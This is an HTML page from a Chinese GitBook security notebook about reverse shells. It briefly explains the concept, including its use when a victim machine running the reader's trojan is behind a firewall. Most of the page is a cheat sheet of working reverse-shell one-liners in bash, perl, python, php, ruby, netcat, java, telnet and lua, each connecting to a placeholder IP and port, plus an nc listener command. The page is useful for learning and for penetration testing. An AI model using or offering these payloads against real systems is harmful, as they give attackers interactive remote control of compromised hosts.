            
        </li>
    
        <li class="chapter " data-level="1.21.2" data-path="../../技术杂项/什么鬼都有/dns-zs.html">
            
                <a href="../../技术杂项/什么鬼都有/dns-zs.html">
            
                    
                    DNS相关的一些小知识
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.3" data-path="../../技术杂项/Linux/gcc.html">
            
                <a href="../../技术杂项/Linux/gcc.html">
            
                    
                    Centos7.8升级GCC
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.4" data-path="../../技术杂项/什么鬼都有/mosquitto.html">
            
                <a href="../../技术杂项/什么鬼都有/mosquitto.html">
            
                    
                    源码安装Mosquitto
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.5" data-path="../../portforward/">
            
                <a href="../../portforward/">
            
                    
                    端口转发
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.6" data-path="../../Protocols/mqtt.html">
            
                <a href="../../Protocols/mqtt.html">
            
                    
                    MQTT介绍
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.7" data-path="../../Protocols/tcp.html">
            
                <a href="../../Protocols/tcp.html">
            
                    
                    TCP 1
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.8" data-path="../../Protocols/tcp三次握手和四次挥手.html">
            
                <a href="../../Protocols/tcp三次握手和四次挥手.html">
            
                    
                    TCP三次握手和四次挥手简要介绍
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.9" data-path="../../Protocols/ip.html">
            
                <a href="../../Protocols/ip.html">
            
                    
                    IP协议简易介绍
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.10" >
            
                <span>
            
                    
                    Prometheus相关
            
                </span>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.11" >
            
                <span>
            
                    
                    Wazuh相关
            
                </span>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.12" data-path="../../技术杂项/Yaml/">
            
                <a href="../../技术杂项/Yaml/">
            
                    
                    Yaml
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.13" data-path="../../技术杂项/工具/">
            
                <a href="../../技术杂项/工具/">
            
                    
                    工具
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.21.13.1" data-path="../../技术杂项/工具/wireshark-linux.html">
            
                <a href="../../技术杂项/工具/wireshark-linux.html">
            
                    
                    Archlinux下安装wireshark后需要做的事
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.13.2" data-path="../../技术杂项/工具/nmap.html">
            
                <a href="../../技术杂项/工具/nmap.html">
            
                    
                    诸神之眼Nmap
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.21.13.3" data-path="../../技术杂项/工具/tcpdump.html">
            
                <a href="../../技术杂项/工具/tcpdump.html">
            
                    
                    Linux下的抓包工具tcpdump
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.22" >
            
                <span>
            
                    
                    数据库
            
                </span>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.22.1" >
            
                <span>
            
                    
                    MySQL
            
                </span>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.22.1.1" data-path="../../数据库/mysql/introduction.html">
            
                <a href="../../数据库/mysql/introduction.html">
            
                    
                    MySQL简介
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.22.1.2" data-path="../../数据库/mysql/basic.html">
            
                <a href="../../数据库/mysql/basic.html">
            
                    
                    MySQL基础
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.22.1.3" data-path="../../数据库/mysql/select.html">
            
                <a href="../../数据库/mysql/select.html">
            
                    
                    MySQL数据查询
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.22.2" data-path="../../数据库/postgresql/README.md">
            
                <span>
            
                    
                    Postgresql
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.22.3" >
            
                <span>
            
                    
                    Redis
            
                </span>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.22.3.1" data-path="../../数据库/Redis/install.html">
            
                <a href="../../数据库/Redis/install.html">
            
                    
                    安装Redis
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.22.3.2" data-path="../../数据库/Redis/datatype.html">
            
                <a href="../../数据库/Redis/datatype.html">
            
                    
                    Redis数据类型
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.22.3.3" data-path="../../数据库/Redis/command.html">
            
                <a href="../../数据库/Redis/command.html">
            
                    
                    Redis命令
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.22.3.4" data-path="../../数据库/Redis/redis-security.html">
            
                <a href="../../数据库/Redis/redis-security.html">
            
                    
                    Redis安全
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.23" data-path="../../operating-systems/process.html">
            
                <a href="../../operating-systems/process.html">
            
                    
                    进程小总结
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.24" >
            
                <span>
            
                    
                    数据结构相关
            
                </span>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.24.1" data-path="../../数据结构/数据结构基础理论知识/数据结构介绍.mc">
            
                <span>
            
                    
                    数据结构介绍
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.25" data-path="../../About/学习方法.html">
            
                <a href="../../About/学习方法.html">
            
                    
                    吐槽1
            
                </a>
            

            
        </li>
    

    

    <li class="divider"></li>

    <li>
        <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
            Published with GitBook
        </a>
    </li>
</ul>


                </nav>
            
        
    </div>

    <div class="book-body">
        
            <div class="body-inner">
                
                    

<div class="book-header" role="navigation">
    

    <!-- Title -->
    <h1>
        <i class="fa fa-circle-o-notch fa-spin"></i>
        <a href="../.." >反弹shell</a>
    </h1>
</div>




                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <h5 id="&#x4EC0;&#x4E48;&#x662F;&#x53CD;&#x5F39;shell&#xFF1F;">&#x4EC0;&#x4E48;&#x662F;&#x53CD;&#x5F39;shell&#xFF1F;</h5>
<p>&#x53CD;&#x5F39;shell&#xFF0C;&#x5C31;&#x662F;&#x63A7;&#x5236;&#x7AEF;&#x76D1;&#x542C;&#x5728;&#x67D0;&#x4E2A;tcp/udp&#x7AEF;&#x53E3;&#xFF0C;&#x88AB;&#x63A7;&#x7AEF;&#x53D1;&#x8D77;&#x8BF7;&#x6C42;&#x5230;&#x8BE5;&#x7AEF;&#x53E3;&#xFF0C;&#x5E76;&#x5C06;&#x5176;&#x547D;&#x4EE4;&#x884C;&#x7684;&#x8F93;&#x5165;&#x8F93;&#x51FA;&#x8F6C;&#x5230;&#x63A7;&#x5236;&#x7AEF;&#x3002;</p>
<h5 id="&#x4E3A;&#x4EC0;&#x4E48;&#x9700;&#x8981;&#x53CD;&#x5F39;shell">&#x4E3A;&#x4EC0;&#x4E48;&#x9700;&#x8981;&#x53CD;&#x5F39;shell</h5>
<ol>
<li>&#x67D0;&#x5BA2;&#x6237;&#x673A;&#x4E2D;&#x4E86;&#x4F60;&#x7684;&#x9A6C;&#xFF0C;&#x4F46;&#x662F;&#x5B83;&#x5728;&#x5185;&#x7F51;&#x4E2D;&#xFF0C;&#x4F60;&#x4E0D;&#x80FD;&#x76F4;&#x63A5;&#x5BF9;&#x5176;&#x8FDB;&#x884C;&#x8FDE;&#x63A5;</li>
<li>&#x5BA2;&#x6237;&#x673A;&#x7684;IP&#x662F;&#x52A8;&#x6001;&#x7684;&#x4F1A;&#x53D1;&#x751F;&#x53D8;&#x5316;&#x7684;&#xFF0C;&#x4E0D;&#x80FD;&#x6301;&#x7EED;&#x63A7;&#x5236;</li>
<li>&#x7531;&#x4E8E;&#x9632;&#x706B;&#x5899;&#x7B49;&#x9650;&#x5236;&#xFF0C;&#x5BF9;&#x65B9;&#x673A;&#x5668;&#x53EA;&#x80FD;&#x53D1;&#x9001;&#x8BF7;&#x6C42;&#xFF0C;&#x4E0D;&#x80FD;&#x63A5;&#x53D7;&#x8BF7;&#x6C42;</li>
<li>&#x5BF9;&#x4E8E;&#x75C5;&#x6BD2;&#xFF0C;&#x6728;&#x9A6C;&#xFF0C;&#x53D7;&#x5BB3;&#x8005;&#x4EC0;&#x4E48;&#x65F6;&#x5019;&#x4E2D;&#x62DB;&#xFF0C;&#x5BF9;&#x65B9;&#x6240;&#x5904;&#x7684;&#x7F51;&#x7EDC;&#x73AF;&#x5883;&#x662F;&#x4EC0;&#x4E48;&#x6837;&#x7684;&#xFF0C;&#x4EC0;&#x4E48;&#x65F6;&#x5019;&#x5F00;&#x5173;&#x673A;&#x7B49;&#x60C5;&#x51B5;&#x90FD;&#x662F;&#x672A;&#x77E5;&#x7684;&#xFF0C;&#x6240;&#x4EE5;&#x9700;&#x8981;&#x5EFA;&#x7ACB;&#x4E00;&#x4E2A;&#x670D;&#x52A1;&#x7AEF;&#x8BA9;&#x800C;&#x5DF2;&#x7A0B;&#x5E8F;&#x4E3B;&#x52A8;&#x8FDE;&#x63A5;</li>
</ol>
<h5 id="&#x53CD;&#x5F39;shell&#x7684;&#x4E00;&#x4E9B;&#x524D;&#x7F6E;&#x77E5;&#x8BC6;">&#x53CD;&#x5F39;shell&#x7684;&#x4E00;&#x4E9B;&#x524D;&#x7F6E;&#x77E5;&#x8BC6;</h5>
<table>
<thead>
<tr>
<th>&#x63CF;&#x8FF0;&#x7B26;</th>
<th>&#x4F5C;&#x7528;</th>
</tr>
</thead>
<tbody>
<tr>
<td>&lt; &#x6216; &lt;&lt;</td>
<td>&#x6807;&#x51C6;&#x8F93;&#x5165;&#xFF0C;&#x4EE3;&#x7801;&#x4E3A;0</td>
</tr>
<tr>
<td>&gt; &#x6216; &gt;&gt;</td>
<td>&#x6807;&#x51C6;&#x8F93;&#x5165;&#x51FA;&#xFF0C;&#x4EE3;&#x7801;&#x4E3A;1</td>
</tr>
<tr>
<td>2&gt; &#x6216; 2&gt;&gt;</td>
<td>&#x6807;&#x51C6;&#x9519;&#x8BEF;&#x8F93;&#x51FA;&#xFF0C;&#x4EE3;&#x7801;&#x4E3A;2</td>
</tr>
<tr>
<td>/dev/tcp[udp]/ip/port</td>
<td>Linux&#x4E2D;&#x7684;&#x4E00;&#x4E2A;&#x7279;&#x6B8A;&#x8BBE;&#x5907;&#xFF0C;&#x6253;&#x5F00;&#x8FD9;&#x4E2A;&#x6587;&#x4EF6;&#x5C31;&#x76F8;&#x5F53;&#x4E8E;&#x53D1;&#x51FA;&#x4E86;&#x4E00;&#x4E2A;socket&#x8C03;&#x7528;&#xFF0C;&#x8BFB;&#x5199;&#x8FD9;&#x4E2A;&#x6587;&#x4EF6;&#x5C31;&#x76F8;&#x5F53;&#x4E8E;&#x5728;&#x8FD9;&#x4E2A;socket&#x8FDE;&#x63A5;&#x4E2D;&#x4F20;&#x8F93;&#x6570;&#x636E;</td>
</tr>
<tr>
<td>&amp;&gt;</td>
<td>&amp;&gt;&#x8DDF;2&gt;&amp;1&#x662F;&#x4E00;&#x4E2A;&#x610F;&#x601D;&#x90FD;&#x662F;&#x5C06;&#x6807;&#x51C6;&#x9519;&#x8BEF;&#x8F93;&#x51FA;&#x5408;&#x5E76;&#x5230;&#x6807;&#x51C6;&#x8F93;&#x51FA;&#x4E2D;</td>
</tr>
</tbody>
</table>
<h5 id="&#x53CD;&#x5F39;shell&#x793A;&#x4F8B;">&#x53CD;&#x5F39;shell&#x793A;&#x4F8B;</h5>
<p>&#x88AB;&#x7A7A;&#x7AEF;A: 192.168.10.112</p>
<pre><code class="lang-bash">bash -i &gt;&amp; /dev/tcp/192.168.7.108/8433
</code></pre>
<p>Note: -i &#x7684;&#x610F;&#x601D;&#x662F;&#x542F;&#x52A8;&#x4E00;&#x4E2A;&#x4EA4;&#x4E92;&#x5F0F;&#x7684;shell</p>
<p>&#x63A7;&#x5236;&#x7AEF;B: 192.168.7.108</p>
<pre><code class="lang-bash">nc -lvvp 8433
</code></pre>
<h5 id="&#x53CD;&#x5F39;shell&#x5404;&#x79CD;&#x59FF;&#x52BF;">&#x53CD;&#x5F39;shell&#x5404;&#x79CD;&#x59FF;&#x52BF;</h5>
<ol>
<li>bash</li>
</ol>
<pre><code class="lang-bash">bash -i &gt;&amp; /dev/tcp/192.168.7.101/8099
</code></pre>
<ol>
<li>perl</li>
</ol>
<pre><code class="lang-perl">perl -e <span class="hljs-string">&apos;use Socket;$i=&quot;10.0.0.1&quot;;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;/bin/sh -i&quot;);};&apos;</span>
</code></pre>
<ol>
<li>perl&#x4E0D;&#x4F9D;&#x8D56;/bin/sh</li>
</ol>
<pre><code class="lang-perl">perl -MIO -e <span class="hljs-string">&apos;$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,&quot;123.123.123.123:4444&quot;);STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;&apos;</span>
</code></pre>
<ol>
<li>perl windows&#x73AF;&#x5883;</li>
</ol>
<pre><code class="lang-perl">perl -MIO -e <span class="hljs-string">&apos;$c=new IO::Socket::INET(PeerAddr,&quot;123.123.123.123:4444&quot;);STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;&apos;</span>
</code></pre>
<ol>
<li>Python2</li>
</ol>
<pre><code class="lang-python">python -c <span class="hljs-string">&apos;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.0.0.1&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&apos;</span>
</code></pre>
<ol>
<li>php</li>
</ol>
<pre><code class="lang-php">php -r <span class="hljs-string">&apos;$sock=fsockopen(&quot;10.0.0.1&quot;,1234);exec(&quot;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&apos;</span>
</code></pre>
<ol>
<li>ruby</li>
</ol>
<pre><code class="lang-ruby">ruby -rsocket -e<span class="hljs-string">&apos;f=TCPSocket.open(&quot;10.0.0.1&quot;,1234).to_i;exec sprintf(&quot;/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d&quot;,f,f,f)&apos;</span>
</code></pre>
<ol>
<li>ruby windows&#x73AF;&#x5883;</li>
</ol>
<pre><code class="lang-ruby">ruby -rsocket -e <span class="hljs-string">&apos;c=TCPSocket.new(&quot;123.123.123.123&quot;,&quot;4444&quot;);while(cmd=c.gets);IO.popen(cmd,&quot;r&quot;){|io|c.print io.read}end&apos;</span>
</code></pre>
<ol>
<li>ruby&#x4E0D;&#x4F9D;&#x8D56;sh</li>
</ol>
<pre><code class="lang-ruby">ruby -rsocket -e <span class="hljs-string">&apos;exit if fork;c=TCPSocket.new(&quot;123.123.123.123&quot;,&quot;4444&quot;);while(cmd=c.gets);IO.popen(cmd,&quot;r&quot;){|io|c.print io.read}end&apos;</span>
</code></pre>
<ol>
<li>NC</li>
</ol>
<pre><code class="lang-bash">nc <span class="hljs-_">-e</span> /bin/sh 10.0.0.1 1234

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i
 2&gt;&amp;1|nc 10.0.0.1 1234 &gt;/tmp/f
</code></pre>
<ol>
<li>java</li>
</ol>
<pre><code class="lang-java">r = Runtime.getRuntime()
p = r.exec([&quot;/bin/bash&quot;,&quot;-c&quot;,&quot;exec 5&lt;&gt;/dev/tc
p/10.0.0.1/2002;cat &lt;&amp;5 | while read line; do
 \$line 2&gt;&amp;5 &gt;&amp;5; done&quot;] as String[])
p.waitFor()
</code></pre>
<ol>
<li>NC&#x4E0D;&#x53EF;&#x7528;&#x6216;&#x8005;/dev/tcp&#x4E0D;&#x53EF;&#x7528;&#x65F6;</li>
</ol>
<pre><code class="lang-bash">mknod backpipe p &amp;&amp; telnet 123.133.133.133 8080 0&lt;backpipe | /bin/bash 1&gt;backpipe
</code></pre>
<ol>
<li>lua</li>
</ol>
<pre><code class="lang-lua">lua -e <span class="hljs-string">&quot;require(&apos;socket&apos;);require(&apos;os&apos;);t=socket.tcp();t:connect(&apos;10.0.0.1&apos;,&apos;1234&apos;);os.execute(&apos;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&apos;);&quot;</span>
</code></pre>
<h5 id="&#x53C2;&#x8003;&#x94FE;&#x63A5;">&#x53C2;&#x8003;&#x94FE;&#x63A5;</h5>
<p><a href="https://zhuanlan.zhihu.com/p/138393396" target="_blank">&#x53CD;&#x5F39;shell&#x539F;&#x7406;&#x4E0E;&#x5B9E;&#x73B0;</a></p>
<p><a href="https://cloud.tencent.com/developer/article/1785076" target="_blank">&#x53CD;&#x5F39;SHELL&#x4ECB;&#x7ECD;&#x53CA;&#x539F;&#x7406;</a></p>
<p><a href="https://xz.aliyun.com/t/9488" target="_blank">&#x53CD;&#x5F39;Shell&#xFF0C;&#x770B;&#x8FD9;&#x4E00;&#x7BC7;&#x5C31;&#x591F;&#x4E86;</a></p>
<p><a href="https://xz.aliyun.com/t/2549#toc-0" target="_blank">Linux &#x53CD;&#x5F39;shell&#xFF08;&#x4E8C;&#xFF09;&#x53CD;&#x5F39;shell&#x7684;&#x672C;&#x8D28;</a></p>
<p><a href="https://www.anquanke.com/post/id/85712" target="_blank">Linux&#x6E17;&#x900F;&#x4E4B;&#x53CD;&#x5F39;Shell&#x547D;&#x4EE4;&#x89E3;&#x6790;</a></p>
<p><a href="https://www.lintstar.top/tools/Reverse-shell.html" target="_blank">Reverse Shell Cheat Sheet</a></p>
<p><a href="https://www.cnblogs.com/xiaozi/p/13493010.html" target="_blank">&#x53CD;&#x5F39;shell&#x7684;&#x5404;&#x79CD;&#x59FF;&#x52BF;</a></p>
<hr>
<p>that&apos;s all</p>

                                
                                </section>
                            
    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                <a href="cmd.html" class="navigation navigation-prev " aria-label="Previous page: 命令注入漏洞简介">
                    <i class="fa fa-angle-left"></i>
                </a>
                
                
                <a href="../OOB/" class="navigation navigation-next " aria-label="Next page: OOB">
                    <i class="fa fa-angle-right"></i>
                </a>
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"反弹shell","level":"1.15.3","depth":2,"next":{"title":"OOB","level":"1.15.4","depth":2,"path":"Security/OOB/README.md","ref":"Security/OOB/README.md","articles":[]},"previous":{"title":"命令注入漏洞简介","level":"1.15.2","depth":2,"path":"Security/命令注入/cmd.md","ref":"Security/命令注入/cmd.md","articles":[]},"dir":"ltr"},"config":{"gitbook":"*","theme":"default","variables":{},"plugins":[],"pluginsConfig":{"highlight":{},"search":{},"lunr":{"maxIndexSize":1000000,"ignoreSpecialCharacters":false},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2},"theme-default":{"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"showLevel":false}},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"}},"file":{"path":"Security/命令注入/反弹shell.md","mtime":"2022-01-09T08:53:43.263Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2022-12-28T13:22:22.994Z"},"basePath":"../..","book":{"language":""}});
        });
    </script>
</div>

        
    <script src="../../gitbook/gitbook.js"></script>
    <script src="../../gitbook/theme.js"></script>
    
        
        <script src="../../gitbook/gitbook-plugin-search/search-engine.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-search/search.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-lunr/lunr.min.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-lunr/search-lunr.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-sharing/buttons.js"></script>
        
    
        
        <script src="../../gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    

    </body>
</html>

